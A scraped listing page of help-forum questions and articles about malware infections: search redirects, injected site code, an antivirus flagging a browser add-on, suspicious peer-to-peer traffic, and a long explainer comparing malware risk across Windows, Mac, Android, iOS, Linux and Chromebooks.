    This machine was infected with various malware. I have scanned the system with Malwarebytes. It found and removed some 600 or so infected files. Now the machine seems to be running well with only one exception. Some Google search results are being redirected to some shady search engines. If I were to copy the url from the Google Search results and paste it in the address bar it would go to the correct site but if I click the link I will be redirected somewhere else. Here is my log file from HijackThis: http://pastebin.com/ZE3wiCrk

    Read the article

  • regex question for removal of javascript malware

    - by jeff
    Been hit with some nasty javascript malware on my site. I know that each offending code block starts with the following: <script language=javascript><!-- (function() and ends with </script> I'd like to remove the nasty bits via regex on windows, using some sort of freeware regex replacement tool. Any suggestions here? Thank You much.

    Read the article

  • How can I fix the #c3284d# malvertising hack on my website?

    - by crm
    For the past couple of weeks at semi regular intervals, this website has had the #c3284d# malware code inserted into some of its .php files. Also the .htaccess file had its equivelant code inserted. I have, on many occasions removed the malicious code, replaced files, changed the ftp password on my ftp client (which is CoreFTP), changed the connection method to FTPS for more secure storage of the password (instead of plain text). I have also scanned my computer several times using AVG and Windows Defender which have found no malware on my computer which might have been storing my ftp passwords. I used Sucuri SiteCheck to check my website which says my website is clean of malware which is bizarre because I just attempted to click one of the links on the site a minute ago and it linked me to another one of these random stats.php sites, even though it appears I have gotten rid of the #c3284d# code again (which will no doubt be re-inserted somehow in an hour or so).. Has anyone found an actual viable solution for this malware hack? I have done just about all of the things suggested here and here and the problem still persists. Currently when I click on a link within the sites navigation menu within Google Chrome I get googles Malware warning page: Warning: Something's Not Right Here! oxsanasiberians.com contains malware. Your computer might catch a virus if you visit this site. Google has found that malicious software may be installed onto your computer if you proceed. If you've visited this site in the past or you trust this site, it's possible that it has just recently been compromised by a hacker. You should not proceed. Why not try again tomorrow or go somewhere else? We have already notified oxsanasiberians.com that we found malware on the site. For more about the problems found on oxsanasiberians.com, visit the Google Safe Browsing diagnostic page. I'm wondering if it is possible that the Google Chrome browser I am using has itself been hacked? Does anyone else get re-directed when clicking links on the the website?

    Read the article

  • My BrowserHelperObject is detected by avg as a malware, what is going wrong.

    - by BHOdevelopper
    Hi i'm building a BrowserHelperObject in c++ for Internet Explorer 8. It is a friendly add-on that gives you fonctionalities in a sidebar. The thing is that when you download the add-on executable from the web, AVG (AntiVirusGuard) detects the executable file as a malware. I did a lot of research and i can't find a way to not being seen as a bad malware. I know that BrowserHelperObject are often seen as malware, but mine is just a good and friendly add-on. Does anyone as info on how antivirus detection works and what can i do to prevent being seen as a malware. What has to be done to the BHO to pass avg detection ? Thank you.

    Read the article

  • Malware - Technical anlaysis

    - by nullptr
    Note: Please do not mod down or close. Im not a stupid PC user asking to fix my pc problem. I am intrigued and am having a deep technical look at whats going on. I have come across a Windows XP machine that is sending unwanted p2p traffic. I have done a 'netstat -b' command and explorer.exe is sending out the traffic. When I kill this process the traffic stops and obviously Windows Explorer dies. Here is the header of the stream from the Wireshark dump (x.x.x.x) is the machines IP. GNUTELLA CONNECT/0.6 Listen-IP: x.x.x.x:8059 Remote-IP: 76.164.224.103 User-Agent: LimeWire/5.3.6 X-Requeries: false X-Ultrapeer: True X-Degree: 32 X-Query-Routing: 0.1 X-Ultrapeer-Query-Routing: 0.1 X-Max-TTL: 3 X-Dynamic-Querying: 0.1 X-Locale-Pref: en GGEP: 0.5 Bye-Packet: 0.1 GNUTELLA/0.6 200 OK Pong-Caching: 0.1 X-Ultrapeer-Needed: false Accept-Encoding: deflate X-Requeries: false X-Locale-Pref: en X-Guess: 0.1 X-Max-TTL: 3 Vendor-Message: 0.2 X-Ultrapeer-Query-Routing: 0.1 X-Query-Routing: 0.1 Listen-IP: 76.164.224.103:15649 X-Ext-Probes: 0.1 Remote-IP: x.x.x.x GGEP: 0.5 X-Dynamic-Querying: 0.1 X-Degree: 32 User-Agent: LimeWire/4.18.7 X-Ultrapeer: True X-Try-Ultrapeers: 121.54.32.36:3279,173.19.233.80:3714,65.182.97.15:5807,115.147.231.81:9751,72.134.30.181:15810,71.59.97.180:24295,74.76.84.250:25497,96.234.62.221:32344,69.44.246.38:42254,98.199.75.23:51230 GNUTELLA/0.6 200 OK So it seems that the malware has hooked into explorer.exe and hidden its self quite well as a Norton Scan doesn't pick anything up. I have looked in Windows firewall and it shouldn't be letting this traffic through. I have had a look into the messages explorer.exe is sending in Spy++ and the only related ones I can see are socket connections etc... My question is what can I do to look into this deeper? What does malware achieve by sending p2p traffic? I know to fix the problem the easiest way is to reinstall Windows but I want to get to the bottom of it first, just out of interest.

    Read the article

  • Microsoft Claims Success Versus Autorun Malware

    Microsoft recently used a post on the Threat Research and Response Blog section of its Malware Protection Center to describe how it is winning the battle against autorun malware. Although there is certainly no shortage of malware in the virtual world Microsoft has plenty of statistics to back its claims and it has displayed them with pride.... DNS Configured Correctly? Test Your Internal DNS With Our Free DNS Advisor Tool From Infoblox.

    Read the article

  • HTG Explains: Do Non-Windows Platforms Like Mac, Android, iOS, and Linux Get Viruses?

    - by Chris Hoffman
    Viruses and other types of malware seem largely confined to Windows in the real world. Even on a Windows 8 PC, you can still get infected with malware. But how vulnerable are other operating systems to malware? When we say “viruses,” we’re actually talking about malware in general. There’s more to malware than just viruses, although the word virus is often used to talk about malware in general. Why Are All the Viruses For Windows? Not all of the malware out there is for Windows, but most of it is. We’ve tried to cover why Windows has the most viruses in the past. Windows’ popularity is definitely a big factor, but there are other reasons, too. Historically, Windows was never designed for security in the way that UNIX-like platforms were — and every popular operating system that’s not Windows is based on UNIX. Windows also has a culture of installing software by searching the web and downloading it from websites, whereas other platforms have app stores and Linux has centralized software installation from a secure source in the form of its package managers. Do Macs Get Viruses? The vast majority of malware is designed for Windows systems and Macs don’t get Windows malware. While Mac malware is much more rare, Macs are definitely not immune to malware. They can be infected by malware written specifically for Macs, and such malware does exist. At one point, over 650,000 Macs were infected with the Flashback Trojan. [Source] It infected Macs through the Java browser plugin, which is a security nightmare on every platform. Macs no longer include Java by default. Apple also has locked down Macs in other ways. Three things in particular help: Mac App Store: Rather than getting desktop programs from the web and possibly downloading malware, as inexperienced users might on Windows, they can get their applications from a secure place. It’s similar to a smartphone app store or even a Linux package manager. Gatekeeper: Current releases of Mac OS X use Gatekeeper, which only allows programs to run if they’re signed by an approved developer or if they’re from the Mac App Store. This can be disabled by geeks who need to run unsigned software, but it acts as additional protection for typical users. XProtect: Macs also have a built-in technology known as XProtect, or File Quarantine. This feature acts as a blacklist, preventing known-malicious programs from running. It functions similarly to Windows antivirus programs, but works in the background and checks applications you download. Mac malware isn’t coming out nearly as quick as Windows malware, so it’s easier for Apple to keep up. Macs are certainly not immune to all malware, and someone going out of their way to download pirated applications and disable security features may find themselves infected. But Macs are much less at risk of malware in the real world. Android is Vulnerable to Malware, Right? Android malware does exist and companies that produce Android security software would love to sell you their Android antivirus apps. But that isn’t the full picture. By default, Android devices are configured to only install apps from Google Play. They also benefit from antimalware scanning — Google Play itself scans apps for malware. You could disable this protection and go outside Google Play, getting apps from elsewhere (“sideloading”). Google will still help you if you do this, asking if you want to scan your sideloaded apps for malware when you try to install them. In China, where many, many Android devices are in use, there is no Google Play Store. Chinese Android users don’t benefit from Google’s antimalware scanning and have to get their apps from third-party app stores, which may contain infected copies of apps. The majority of Android malware comes from outside Google Play. The scary malware statistics you see primarily include users who get apps from outside Google Play, whether it’s pirating infected apps or acquiring them from untrustworthy app stores. As long as you get your apps from Google Play — or even another secure source, like the Amazon App Store — your Android phone or tablet should be secure. What About iPads and iPhones? Apple’s iOS operating system, used on its iPads, iPhones, and iPod Touches, is more locked down than even Macs and Android devices. iPad and iPhone users are forced to get their apps from Apple’s App Store. Apple is more demanding of developers than Google is — while anyone can upload an app to Google Play and have it available instantly while Google does some automated scanning, getting an app onto Apple’s App Store involves a manual review of that app by an Apple employee. The locked-down environment makes it much more difficult for malware to exist. Even if a malicious application could be installed, it wouldn’t be able to monitor what you typed into your browser and capture your online-banking information without exploiting a deeper system vulnerability. Of course, iOS devices aren’t perfect either. Researchers have proven it’s possible to create malicious apps and sneak them past the app store review process. [Source] However, if a malicious app was discovered, Apple could pull it from the store and immediately uninstall it from all devices. Google and Microsoft have this same ability with Android’s Google Play and Windows Store for new Windows 8-style apps. Does Linux Get Viruses? Malware authors don’t tend to target Linux desktops, as so few average users use them. Linux desktop users are more likely to be geeks that won’t fall for obvious tricks. As with Macs, Linux users get most of their programs from a single place — the package manager — rather than downloading them from websites. Linux also can’t run Windows software natively, so Windows viruses just can’t run. Linux desktop malware is extremely rare, but it does exist. The recent “Hand of Thief” Trojan supports a variety of Linux distributions and desktop environments, running in the background and stealing online banking information. It doesn’t have a good way if infecting Linux systems, though — you’d have to download it from a website or receive it as an email attachment and run the Trojan. [Source] This just confirms how important it is to only run trusted software on any platform, even supposedly secure ones. What About Chromebooks? Chromebooks are locked down laptops that only run the Chrome web browser and some bits around it. We’re not really aware of any form of Chrome OS malware. A Chromebook’s sandbox helps protect it against malware, but it also helps that Chromebooks aren’t very common yet. It would still be possible to infect a Chromebook, if only by tricking a user into installing a malicious browser extension from outside the Chrome web store. The malicious browser extension could run in the background, steal your passwords and online banking credentials, and send it over the web. Such malware could even run on Windows, Mac, and Linux versions of Chrome, but it would appear in the Extensions list, would require the appropriate permissions, and you’d have to agree to install it manually. And Windows RT? Microsoft’s Windows RT only runs desktop programs written by Microsoft. Users can only install “Windows 8-style apps” from the Windows Store. This means that Windows RT devices are as locked down as an iPad — an attacker would have to get a malicious app into the store and trick users into installing it or possibly find a security vulnerability that allowed them to bypass the protection. Malware is definitely at its worst on Windows. This would probably be true even if Windows had a shining security record and a history of being as secure as other operating systems, but you can definitely avoid a lot of malware just by not using Windows. Of course, no platform is a perfect malware-free environment. You should exercise some basic precautions everywhere. Even if malware was eliminated, we’d have to deal with social-engineering attacks like phishing emails asking for credit card numbers. Image Credit: stuartpilbrow on Flickr, Kansir on Flickr     

    Read the article

< Previous Page | 1 2 3 4 5 6 7 8 9 10 11 12  | Next Page >